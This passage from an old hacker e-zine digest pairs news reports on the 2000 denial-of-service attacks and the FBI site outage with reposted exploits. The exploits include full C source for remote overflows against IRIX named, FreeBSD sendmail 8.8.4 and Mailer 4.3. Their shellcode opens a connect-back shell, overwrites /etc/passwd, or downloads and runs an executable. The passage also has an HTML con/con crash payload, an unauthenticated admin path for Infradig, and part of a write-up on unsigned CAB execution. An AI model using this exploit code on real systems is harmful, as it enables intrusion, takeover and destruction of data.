      tools were used in the denial of service attacks, recent speculation
      has focused on tools with names like Trinoo, Tribe Flood Network and
      Stacheldracht (German for "barbed wire").
      
      These tools allow an attacker to place agents on "zombie" computers
      around the world and then wake them up simultaneously to launch a
      crippling stream of Web traffic at a target site. Security officials
      at the FBI and other computer security agencies have been warning of
      the danger these tools pose for several months and have provided
      software to help guard against their use.
      
      But the new version of Trinoo heightens the danger because it makes
      attacks easier to launch. Because the new version can infiltrate
      Windows NT-, Windows 95- and Windows 98-based machines, far more
      computers are at risk of becoming hosts.
      
      The Windows version also allows the tools to be spread as apparently
      innocuous email attachments, much like ordinary viruses. Computer
      security experts say they haven't seen this happen yet, but that the
      Windows platform makes it relatively easy to do.
      
      "This does make (denial of service attacks) easier," said Elias Levy,
      chief technical officer for SecurityFocus.com, a computer security Web
      site. "Not that it required a lot of intelligence or skill before. But
      this does bring it down another notch."
      
      The new tools are largely a threat to users with always-on DSL
      (digital subscriber line) or cable modem connections, analysts said.
      
      This kind of threat has been seen before with the Back Orifice
      software, Levy noted. That package, once surreptitiously installed on
      a system, allows an outside person to control the computer remotely.
      The Trinoo package is geared more specifically for launching denial of
      service attacks, however.
      
      Most of the major antivirus firms have already developed or are
      developing tools to scan for and remove the new Trinoo software.
      
      
      ---------------------------------------------------
      "Communications without intelligence is noise;
      Intelligence without communications is irrelevant."
      Gen. Alfred. M. Gray, USMC
      ---------------------------------------------------
      C4I Secure Solutions             http://www.c4i.org
      *=================================================*
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA      
      
177.0 ISN:FBI Admits site was defaced
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://www.sjmercury.com/svtech/news/breaking/ap/docs/252799l.htm
      
      FBI admits its site was attacked
      
      BY TED BRIDIS
      AP Technology Writer
      
      WASHINGTON (AP) -- The FBI acknowledged Friday that electronic vandals
      shut down its own Internet site for hours last week in the same type of
      attack that disrupted some of the Web's major commercial sites.
      
      The bureau's Web site, www.fbi.gov, remained inaccessible for more than
      three hours Feb. 18 because vandals overwhelmed it by transmitting
      spurious signals.
      
      ``The FBI has made comments they're going to find who's responsible for
      the latest attacks, so it's a bit of war between the hackers and the
      bureau,'' said James Williams, a Chicago lawyer and former FBI agent who
      specialized in investigating computer crimes.
      
      The technique, which doesn't require particular sophistication, is similar
      to repeatedly dialing a phone number to block all other incoming calls.
      Last year, the FBI pulled down its World Wide Web site for days after
      hackers overwhelmed it using the same type of attack.
      
      No one has claimed responsibility for launching last week's attack against
      the same law enforcement agency that is investigating serious disruptions
      earlier this month at Yahoo!, eBay, ETrade, Amazon.Com and others.
      
      ``Pretty much anyone is a target,'' agreed John McGowan, a research
      engineer at ICSA.Net, a computer security firm. He wasn't surprised no one
      has claimed credit.
      
      ``I don't think I'd want to go around bragging that it was my group that
      shut down the FBI,'' McGowan said. ``They're certainly turning up the
      carpets and looking for anything they can find.''
      
      The FBI said last week that it couldn't determine whether the problem was
      a technical fault or malicious attack, but a spokeswoman, Deborah
      Weierman, confirmed Friday that vandals were responsible. She declined to
      say whether there was any evidence, other than the coincidence in timing,
      to link last week's attack against the FBI to those against other Web
      sites.
      
      The FBI noted that its computers weren't broken into, and that its
      affected Internet site is separate from all its internal systems,
      including investigative files. ``We have had no more problems since
      then,'' Weierman said.
      
      Engineers at IBM, who run the FBI's Internet site under a federal
      contract, ``took the appropriate steps to get our Web site back and
      running (and)  continue to look into remedies and actions to minimize this
      from happening again,'' Weierman said.
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA            
      
178.0 IRIX 5.3 and 6.2 remote bind iquery overflow by LSD
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      98? not 0-day is it? heh...
      
      
      Source: Packetstorm
      
      /*   Copyright (c) May 1998       Last Stage of Delirium   */
      /*      THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF      */
      /*                  Last Stage of Delirium                  */
      /*                                                          */
      /*   The contents of this file  may be disclosed to third   */
      /*   parties, copied and duplicated in any form, in whole   */
      /*   or in part, without the prior written consent of LsD.  */
      
      /* SGI named remote overflow exploit                        */
      /* tested on IRIX 5.3 and 6.2 including multiprocessor and  */ 
      /* multicache machines                                      */
      /* won't work on IRIX64 6.2 since its named binary seems to */
      /* be not vulnerable to the iquery overflow                 */
      
      /* usage ./r local_adr local_port target                    */
      /* you must specify the local_adr and local_port since      */ 
      /* the remote shell is a connecting shell not a classic     */
      /* bind shell (it connects with the local machine)          */
      
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <unistd.h>
      #include <netdb.h>
      #include <stdio.h>
      #include <fcntl.h>
      #include <errno.h>
      
      #define START_ADR       0x10040100      
      
      #define PUTADR(p,adr) {*p=(adr>>24)&0xff;*(p+1)=(adr>>16)&0xff;*(p+2)=(adr>>8)&0xff;*(p+3)=adr&0xff;}
      
      #define PUTADRH(p,adr) {*p=(adr>>24)&0xff;*(p+1)=(adr>>16)&0xff;}
      #define PUTADRL(p,adr) {*p=(adr>>8)&0xff;*(p+1)=adr&0xff;}
      
      char tablica[25]={
      0x00,0x00,0x34,0x34,0x09,0x80,0x00,0x00,
      0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
      0x01,0x00,0x01,0x20,0x20,0x20,0x20,0x00,0x00};
      
      char asmcode[]={
      0x24,0x04,0x00,0x02,0x24,0x05,0x00,0x02,0x24,0x06,0x00,0x00,0x24,0x02,0x04,0x53,
      0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x40,0x80,0x25,0x00,0x40,0x20,0x25,
      0x3c,0x05,0x10,0x04,0x34,0xa5,0xff,0xff,0x24,0x06,0x00,0x10,0x24,0x02,0x04,0x43,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x01,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x02,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x3c,0x04,0x10,0x01,0x34,0x84,0xff,0xf1,0x3c,0x05,0x10,0x02,0x34,0xa5,0xff,0xf2,0x24,0x02,0x03,0xf3,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,
      '/','b','i','n','/','s','h',0, 
      0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,
      0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00  
      };
      
      main(int argc,char **argv){
          int sck,i,srvsck;
          fd_set readfs;
          struct sockaddr_in address;
          struct sockaddr_in local;
          struct hostent *hp;
          int size;
          unsigned long lregt9,lreggp,lstart,lbcop7,ltmp;
          char regt9[4],reggp[4],start[4],bcop7[4];   
          char *b,*p;
          
          printf("IRIX named remote exploit\n");
          printf("Last Stage of Delirium, May 1998, Poland\n\n");
      
          if(argc!=4){
              printf("usage: %s local_adr local_port target\n",argv[0]);exit(1);
          }
      
          srvsck=socket(AF_INET,SOCK_STREAM,0);
      
          bzero(&local,sizeof(local));
          local.sin_family=AF_INET;
          local.sin_port=htons(atoi(argv[2]));
          if((local.sin_addr.s_addr=inet_addr(argv[1]))==-1){
              if((hp=gethostbyname(argv[1]))==NULL){
                  printf("error: address.\n");exit(-1);
              }
              memcpy(&local.sin_addr.s_addr,hp->h_addr,4);
          }
          if (bind(srvsck,(struct sockaddr *)&local,sizeof(local))<0) {
             perror("error");exit(-1);
           } 
      
          lbcop7=lregt9=START_ADR;
          lstart=START_ADR+0x14;      
          lreggp=START_ADR+0x8024;    
          PUTADR(regt9,lregt9);
          PUTADR(reggp,lreggp);
          PUTADR(start,lstart);
          PUTADR(bcop7,lbcop7);
      
          ltmp=START_ADR+0xd8;
          PUTADRH(&asmcode[0x34-20+2],ltmp);
          PUTADRL(&asmcode[0x38-20+2],ltmp);
          ltmp=START_ADR+0xc8;
          PUTADRH(&asmcode[0xa8-20+2+4],ltmp);
          PUTADRL(&asmcode[0xac-20+2+4],ltmp);
          PUTADR(&asmcode[0xcc-20+4],ltmp);
          ltmp=START_ADR+0xd0;
          PUTADRH(&asmcode[0xb0-20+2+4],ltmp);
          PUTADRL(&asmcode[0xb4-20+2+4],ltmp);
          ltmp=local.sin_addr.s_addr;
          PUTADR(&asmcode[0xdc-20],ltmp);
          ltmp=local.sin_port;
          PUTADRL(&asmcode[0xda-20],ltmp);
      
          size=930;
          tablica[0]=(size+23)>>8;
          tablica[1]=(size+23)&0xff;
          tablica[23]=size>>8;
          tablica[24]=size&0xff;
      
          if((b=(char*)malloc(10500))==NULL) return(-1);
          memset(b,0,10500);
          bcopy(tablica,b,sizeof(tablica));
      
          for(i=0;i<sizeof(asmcode);i++)
            b[2+32+i]=asmcode[i];
          for(i=0;i<4;i++){
            b[2+200+420+i]=start[i];
            b[2+200+420+420+i]=regt9[i];
            b[1018+i]=reggp[i];
            b[930+i]=bcop7[i];
            b[1018-(7*8+4)+i]=regt9[i];
          }
          b[968]=0x20;
          b[528]=0x08;
      
          sck=socket(AF_INET,SOCK_STREAM,0);
      
          bzero(&address,sizeof(address));
          address.sin_family=AF_INET;
          address.sin_port=htons(53);
          if((address.sin_addr.s_addr=inet_addr(argv[3]))==-1){
              if((hp=gethostbyname(argv[3]))==NULL){
                  printf("error: address.\n");exit(-1);
              }
              memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
          }
      
      
          if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0){
              perror("error");exit(-1);
          }
          fflush(stdout);
      
          write(sck,b,25+size);
          close(sck);
      
          size=10000;
          b[0]=(size+23)>>8;
          b[1]=(size+23)&0xff;
          b[23]=size>>8;
          b[24]=size&0xff;
      
          sck=socket(AF_INET,SOCK_STREAM,0);
          sleep(1);
          if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0){
              perror("error");exit(-1);
          }
          fflush(stdout);
          write(sck,b,25+size);
          close(sck);
      
          listen(srvsck,5);
          srvsck=accept(srvsck,(struct sockaddr*)&local,&i);
          printf("%s successfully exploited\n",argv[3]); 
          fflush(stdout);
          while(1){
              FD_ZERO(&readfs);
              FD_SET(0,&readfs);
              FD_SET(srvsck,&readfs);   
              if(select(FD_SETSIZE,&readfs,NULL,NULL,NULL)){
                  int cnt;
                  char buf[1024];
                  if(FD_ISSET(0,&readfs)){
                      if((cnt=read(0,buf,1024))<1){
                          if(errno==EWOULDBLOCK||errno==EAGAIN) continue; 
                          else {printf("koniec.\n");exit(-1);}
                      }
                      write(srvsck,buf,cnt);
                  }
                  if(FD_ISSET(srvsck,&readfs)){
                      if((cnt=read(srvsck,buf,1024))<1){
                          if(errno==EWOULDBLOCK||errno==EAGAIN) continue; 
                          else {printf("koniec.\n");exit(-1);}
                      }
                      write(1,buf,cnt);
                  }
              }
          }
         free(b);
         close(srvsck);
      }
      /*                    www.hack.co.za                    */

      @HWA            
      
179.0 FreeBSD Sendmail 8.8.4 mime 7to8 remote exploit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: Packetstorm
      
      More old stuff? anyone still use 8.8.* ??
      
      /*
        sendmail 8.8.4, freebsd, mime 7to8, remote 
        I checked this only at home, at custom installed 8.8.4.
        I have no freebsd with preinstaled 8.8.4 around.
        change cmd[] below to shell command you want, and throw output to sendmail
       */
      
      #include <stdlib.h>
      #include <fcntl.h>
      
      #define BUFSIZE 6100
      #define OFFS -5000
      #define ALIGN 0
      #define ADDRS 15
      
      int get_sp(void) {
      /* __asm__(" movl       %esp,%eax"); */
        return 0xefbf95e4;
      }
      
      /* up to 220 bytes */
      char cmd[]="echo 'h::0:0:/tmp:/bin/bash > /etc/passwd'";
      
      char asmcode[]="\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89"
                "\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46"
                "\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17"
                "\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b"
                "\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
                "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
                "\x02\x02\x02\x02\x02\x02\x2f\x62\x69\x6e\x2f\x73"
                "\x68\x2e\x2d\x63\x2e";
      
      char nop[]="\x90";
      
      char Base64Table[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
      
      void run(unsigned char *buf) {
        unsigned int i, j, k;
      
        printf("MIME-Version: 1.0\n");
        printf("Content-Type: text/plain\n"); 
        printf("Content-Transfer-Encoding: base64\n");
      
        k=strlen(buf) / 3 * 3;
        for (i=0; i < k; i+=3) {
          j=(buf[i] << 16) + (buf[i+1] << 8) + buf[i+2];
          if (i % 54 == 0)
            printf("\n");
          printf("%c", Base64Table[(j & 0xfc0000) >> 18]);
          printf("%c", Base64Table[(j & 0x03f000) >> 12]);
          printf("%c", Base64Table[(j & 0x000fc0) >> 6]);
          printf("%c", Base64Table[j & 0x00003f]);
        }
        switch (strlen(buf) - k) {
          case 1: printf("%c%c==", Base64Table[(buf[k] & 0xfc) >> 2], 
                         Base64Table[(buf[k] & 0x3) << 4]);
              break;
          case 2: printf("%c%c%c=", Base64Table[(buf[k] & 0xfc) >> 2], 
                         Base64Table[((buf[k] & 0x3) << 4)+((buf[k+1] & 0xf0) >> 4)],
                         Base64Table[(buf[k+1] & 0xf) << 2]);
              break;
          default:
        }
        printf("\n");
      }
      
      char code[sizeof(asmcode) + sizeof(cmd)];
      
      main(int argc, char *argv[]) {
        char *buf, *ptr, addr[8];
        int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS;
        int i, noplen=strlen(nop);
      
        if (argc >1) bufsize=atoi(argv[1]);
        if (argc >2) offs=atoi(argv[2]);
        if (argc >3) addrs=atoi(argv[3]);
      
        strcpy(code, asmcode);
        strncat(code, cmd);
        strncat(code, ".");
        code[41]=0x1a+strlen(cmd)+1;
      
        if (bufsize<strlen(code)) {
          printf("bufsize too small, code is %d bytes long\n", strlen(asmcode));
          exit(1);
        }
        if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL) {
          printf("Can't malloc\n");
          exit(1);
        }
        *(int *)addr=get_sp()+offs;
        printf("address - %p\n", *(int *)addr); 
        ptr=buf;
        for (i=0; i<bufsize; i++) 
          *ptr++=nop[i % noplen];
        memcpy(ptr-strlen(code), code, strlen(code));
        for (i=0; i<addrs<<2; i++) 
          *ptr++=addr[i % sizeof(int)];               
        *ptr=0;
        printf("total buf len - %d\n", strlen(buf)); 
      
        run(buf);
      }
      /*                       www.hack.co.za                    */
      
      @HWA      
      
180.0 Infradig 1.225 for Windows remote security hole 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: Packetstorm

      "The administration server on port 81 allows anyone to edit
      accounts, add users, and set all kinds of things."        
      
      +++>===] Written by Nemesystm, leader of the DHC [===<+++
      ++++>==]   Visit us at dhc1.cjb.net You want 2   [==<++++
      
      Subject: Infradig 1.225 Security Hole
      Description program: Infradig is a HTTP Server with a Mail daemon, etc.
      Description hole: There are no restrictions on the online administration bit of the server software.
      
      <-[what was used]->
      Infradig 1.225 for Windows 95/98 downloaded from cnet.com
      Installed with the typical installation, no standard settings changed.
      This problem worked on: Windows 98 + IE5.0
      
      <-[how to create the problem]->
      The administration service runs on port 81 (as adefault, can be set). Connecting to: http://www.server.com:81/sysadmin/sysadmin.cgi will let you edit accounts, add users, set all kinds of things like ports, and start services. (FTP, etc)
      On the HTTP server, you can go to http://www.server.com/sysadmin/ and it will/should automatically refer you to the administration service.
      
      <-[logs]->
      when you go to the administration page, your IP is logged. you can find the logs in programdir\logs.
      It also has what you do, and what browser you used.
      
      <-[fix]->
      Delete: program dir\inetpub\sysadmin\*.*
              program dir\inetpub\mailadmin\*.*
      Change all user things, etc, by rightclicking the server icon in the bottom right corner of the screen and choosing "Manual configure"
      
      Greetz,
      nemesystm, leader of the DHC (dhc1.cjb.net)
      
                                      >>>The End<<<
      auto45040@hushmail.com for questions.
      
      @HWA
      
181.0 Remote exploit for Mailer 4.3 - Win 9x/NT. By Cybz     
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: Packetstorm
      
      /*
      
         Remote exploit for Mailer 4.3 - Win 9x/NT (PRIVATE DO NOT DISTRIBUTE)
         Author: Cybz    (8. dec '99)
         Try offsets +600 to +800
      
      */
      
      
      #include <stdio.h>
      #include <string.h>
      #include <netdb.h>
      #include <netinet/in.h>
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <sys/time.h>
      #include <unistd.h>
      
      #define BUF_SIZE        3412
      #define PORT            110
      #define OFFSET          674
      
      char shellcode[701] = {
         0xEB,0x58,0x5F,0x32,0xC0,0x8B,0xDF,0x33,0xC9,0xB1,0x09,0xFE,0xC1,0x03,0xD9,0x88,
         0x03,0x88,0x47,0x16,0x88,0x47,0x21,0x88,0x47,0x28,0x88,0x47,0x30,0x88,0x47,0x35,
         0x88,0x47,0x41,0x88,0x47,0x47,0x88,0x47,0x4E,0x88,0x47,0x55,0x88,0x47,0x58,0x88,
         0x47,0x5E,0x88,0x47,0x65,0x88,0x47,0x6A,0x8B,0xC7,0x50,0xB8,0x50,0x77,0xF7,0xBF,
         0xFF,0xD0,0x89,0x47,0x6E,0x8B,0xC7,0x33,0xC9,0xB1,0x0B,0x03,0xC1,0x50,0xB8,0x50,
         0x77,0xF7,0xBF,0xFF,0xD0,0x89,0x47,0x72,0xEB,0x02,0xEB,0x72,0x8B,0xC7,0x33,0xC9,
         0xB1,0x17,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
         0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0x33,0xC0,0xB0,0x02,0x50,0xFF,
         0xD6,0x57,0x33,0xC9,0xB1,0x82,0x03,0xF9,0x33,0xC9,0x66,0xB9,0x90,0x01,0x33,0xC0,
         0xF3,0xAA,0x5F,0x8B,0xC7,0x33,0xC9,0xB1,0x22,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,
         0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,0x40,0x50,0x40,0x50,0xFF,
         0xD6,0x89,0x47,0x76,0x8B,0xDF,0x33,0xC9,0xB1,0x82,0x03,0xD9,0xC6,0x03,0x02,0x66,
         0xC7,0x43,0x02,0x1B,0x58,0xC7,0x43,0x04,0xEE,0xEE,0xEE,0xEE,0xEB,0x02,0xEB,0x56,
         0x8B,0xC7,0x33,0xC9,0xB1,0x29,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,
         0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0xB0,0x10,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,
         0x03,0xC1,0x50,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x42,0x03,0xC1,
         0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,
         0xC9,0xB1,0x56,0x03,0xC1,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF,
         0xD6,0x89,0x47,0x7A,0xEB,0x02,0xEB,0x63,0x8B,0xC7,0x33,0xC9,0xB1,0x31,0x03,0xC1,
         0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,
         0x66,0xB8,0xE8,0x03,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0x77,
         0x76,0xFF,0xD6,0x89,0x47,0x7E,0x33,0xDB,0x3B,0xC3,0x74,0x31,0x72,0x2F,0x8B,0xC7,
         0x33,0xC9,0xB1,0x48,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,
         0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,0x77,0x7E,0x33,0xC0,0xB0,0x01,0x50,0x8B,0xC7,
         0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0xD6,0xEB,0x9D,0xEB,0x6C,0x8B,0xC7,0x33,
         0xC9,0xB1,0x36,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,
         0x8B,0xF0,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x4F,0x03,0xC1,0x50,
         0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,
         0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x5F,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,
         0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF,
         0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x66,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,
         0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0x53,0xFF,0xD0,0x90,0xE8,0x03,0xFE,0xFF,0xFF,0x6D,
         0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x2C,0x77,0x73,0x6F,0x63,0x6B,0x33,
         0x32,0x2E,0x64,0x6C,0x6C,0x2C,0x57,0x53,0x41,0x53,0x74,0x61,0x72,0x74,0x75,0x70,
         0x2C,0x73,0x6F,0x63,0x6B,0x65,0x74,0x2C,0x63,0x6F,0x6E,0x6E,0x65,0x63,0x74,0x2C,
         0x72,0x65,0x63,0x76,0x2C,0x63,0x6C,0x6F,0x73,0x65,0x73,0x6F,0x63,0x6B,0x65,0x74,
         0x2C,0x66,0x6F,0x70,0x65,0x6E,0x2C,0x66,0x77,0x72,0x69,0x74,0x65,0x2C,0x66,0x63,
         0x6C,0x6F,0x73,0x65,0x2C,0x77,0x62,0x2C,0x78,0x2E,0x65,0x78,0x65,0x2C,0x73,0x79,
         0x73,0x74,0x65,0x6D,0x2C,0x65,0x78,0x69,0x74,0x2C,0x2C,0x2C,0x2C,0x00 };
      
      
      int     main(int argc,char *argv[])
      {
              char buf[BUF_SIZE];
              struct hostent *info;
              struct sockaddr_in server;
              int fd,i;
              unsigned int ip,port,yourip;
      
              if (argc < 3) {
                  printf("usage: %s <victim> <you>\n", argv[0]);
                  exit(1);
              }
      
              if ((yourip=inet_addr(argv[2]))==-1){
                  if ((info=gethostbyname(argv[2]))==NULL){
                      printf("Unable to resolve local hostname.\n");
                      exit(1);
                  }
                  memcpy((caddr_t)&yourip,info->h_addr,info->h_length);
              }
      
              bzero(&server, sizeof(server));
              server.sin_family = AF_INET;
              server.sin_port = htons(PORT);
              if ((server.sin_addr.s_addr=inet_addr(argv[1]))==-1){
                  if ((info=gethostbyname(argv[1]))==NULL){
                      printf("Can not resolve specified VictimHost.\n");
                      exit(1);
                  }
                  server.sin_family = info->h_addrtype;
                  memcpy((caddr_t)&server.sin_addr.s_addr,info->h_addr,info->h_length);
              }
      
              if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
                  perror("socket");  exit(0);
              }
      
              if(connect(fd, (struct sockaddr *)&server, sizeof(server)) < 0){
                  perror("connect"); exit(0);
              }
              while((i=read(fd,buf,sizeof(buf))) > 0){
                  buf[i]=0;
                  if(strchr(buf,'\n')!=NULL) break;
              }
              memset(buf,0x90,BUF_SIZE);
              for (i=267;i<271;i++) buf[i]=0x30;
      
              ip=htonl(yourip);
              memcpy(buf+OFFSET+4,shellcode,strlen(shellcode));
      
              buf[BUF_SIZE]=0;
              sprintf(buf,"RCPT TO: %s\r\n",buf);
              write(fd,buf,strlen(buf));
              close(fd);
      }
      /*                        www.hack.co.za                    */
      
      @HWA      
      
             
182.0 Variation of the win98 con exploit that crashes netscape as well.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Other variations exist to crash other Win9* Win2* programs, see
      elsewhere in this issue. - Ed
      
      
      Source: Packetstorm
      
      The Windows 98 "Con" exploit 
      
      Although reading various advisories and documents concerning the /con/con 
      exploit, no one has posted it has a hyperlink yet. Some authors did post it like this : 
      
      <HTML> 
      <BODY> 
      <IMG SRC=3D"c:\con\con"> 
      </BODY> 
      </HTML> 
      
      But an author has mentioned that Netscape was not affected (with the example mentioned above), that's very true "if" applied using the method mentioned above. But i've tested on my own IE 5.0 and
      it didn't seem to affect either. So i've tried putting it like this in an html file: 
      
      <HTML> 
      <BODY> 
      <A HREF="file:///C|/con/con"> 
      </BODY> 
      </HTML> 
      
      Click here to test it. 
      NOTE: THIS MIGHT CAUSE YOUR COMPUTER TO LOCK UP/CRASH, TRY AT OWN RISK. 
      
      And that have seemed to affect IE AND Netscape browsers running on Win98 OS. 
      Haven't tested with other browsers yet, so any feedback would be appreciated. 
      
      Neon-Lenz 
      neonlenz@hackermail.net 
      
      @HWA    
      
183.0 Microsoft unsigned .CAB exploit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: Packetstorm
      

               Vulnerability details and example exploit
                  for Microsoft Active Setup control's
               unsigned CAB file execution vulnerability.
   
     Introduction
     
     Microsoft's Active Setup Control (asctrls.ocx) shipped with
     Internet Explorer 4 and above has a vulnerability in it as
     discovered by Juan Carlos Garcia Cuartango
     <cuartango@teleline.es>, which was posted on BUGTRAQ (ID 775)
     in the month of November, 1999. Microsoft has released patches
     for its control which may be procured from its website. This
     document aims to provide the actual details of the
     vulnerability as well as an example exploit.
     
     NOTE: This is NOT a document on the Microsoft signed software
     backdoor vulnerability as posted on BUGTRAQ (ID 999) in
     February 2000.
     
     Disclaimer
     
     The material in this document is released AS IS for EDUCATIONAL
     PURPOSES ONLY. This document may be used by security analysers
     to monitor how probable crackers may intrude into their
     systems. The author of this document does not wish to give his
     opinion on supporting or critisizing vulnerability analysis.
     You are advised against using any of the material in this
     document for criminal purposes.
     
     All responsiblity of action, pros, cons, the cause and effect
     of your action, is on you. You are responsible for EVERYTHING.
     The author is in no way responsible for any sort of action
     which is caused by the material in this document. YOU ARE ON
     YOUR OWN.
     
     Vulnerability Details
     
     On November 8th 1999, a public announcement was made that a
     severe vulnerability existed in Microsoft's Active Setup
     control which was shipped with Internet Explorer 4 and above.
     The vulnerability was so severe that almost any kind of
     break-in was possible into client machines. Email bombs,
     viruses, criminal acts such as gathering of secret documents,
     etc. are all very possible with such a security hole.
     
     Microsoft was quick to release a security bulletin and make
     patches available on its website. Nobody apart from Microsoft
     and Juan Carlos Garcia Cuartango knew how to exploit the
     vulnerability and the whole world was a safer place. Not many
     knew how to use the Active Setup control as not much
     information was released to the public about the control. Now
     that its been quite a while since patches have been made
     available, I have decided to release an example exploit to
     implicitly explain what kind of security measures have to be
     deployed.
     
     The Active Setup control has a vulnerability which allows the
     installation of software from unsigned local CAB files. By
     local files, I mean CAB files on the client machine (as opposed
     to on the Internet). No checking is done and the contents of
     the cabinet file are trusted. This is the vulnerability.
     
     For details on the Active Setup process and using the
     component, please refer to the links provided at the end of
     this document. In short words, the Active Setup control is a
     software component (which may be used in other
     programs/scripts) to install software. The Active Setup control
     is used through function calls in the program/script code. An
     input CAB file contains a list of installation files (including
     executable files) and a cabinet information file (CIF) which
     describes what is to be done with the CAB file.
     
     Exploit Details
     
     PLEASE READ THE DOCUMENTATION ON THE ACTIVE SETUP CONTROL
     (given in links below).
     
     We now examine how this bug may be exploited. Supposing we are
     able to store an unsigned CAB on the client machine, it becomes
     local to the client. Hence, we may process the unsigned CAB
     file using the Active Setup control successfully. We may use an
     HTML file with VBScript in it to run the control. VBScript has
     support for ActiveX controls (Active Setup is an ActiveX
     control). The VBScript is invoked when the HTML file loads. The
     VBScript then initializes the control with details of where the
     CAB file is present on the client machine, and asks the control
     to process the CAB file. The Active Setup control then
     processes the CAB file, and executes EXE programs archived in
     the CAB file with NO SECURITY LIMITATIONS. The EXE program may
     then do anything it wishes to do.
     
     Now, obviously, there are questions in your head. How do I
     transfer a CAB file onto the client's machine? The answer is
     simple. The client user is not mad to download an unsigned CAB
     file. So you may disguise it as a file of another format (in
     short words, rename the file's extension). Now, what types of
     files are implicitly downloaded? HTML, GIF, JPG, etc. which
     make up a page are downloaded when the user visits a site using
     Internet Explorer. But these files are stored in temporary
     directories. Although a CAB file disguised as a JPG file will
     download onto the local client, where will it be stored? The
     location is not fixed. When the location can be determined, we
     may be able to write an exploit for Internet Explorer. But
     until then, there are other options.
     
     Hey, what about Outlook Express? Too many people have told me.
